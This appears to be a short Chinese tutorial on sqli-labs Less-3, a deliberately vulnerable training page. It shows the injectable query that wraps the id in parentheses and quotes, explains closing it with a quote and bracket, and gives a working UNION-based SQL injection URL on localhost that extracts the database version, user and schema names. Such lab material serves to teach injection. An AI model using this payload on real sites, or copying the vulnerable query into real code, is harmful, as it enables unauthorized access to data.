less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

1、针对‘、“做简单的变形，代码如下：

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

具体页面显示如下：

针对提示错误，可以看出针对查询参数添加（）做变形。这种等同于我们开始的单引号报错，闭合方式一样使用括号闭合，然后将后面的单引号注释掉。

http://127.0.0.1/sqli/Less-3/?id=-1')  union select 1,concat_ws(char(32,58,32),version(),database(),user()),schema_name from information_schema.schemata limit 5,1 --+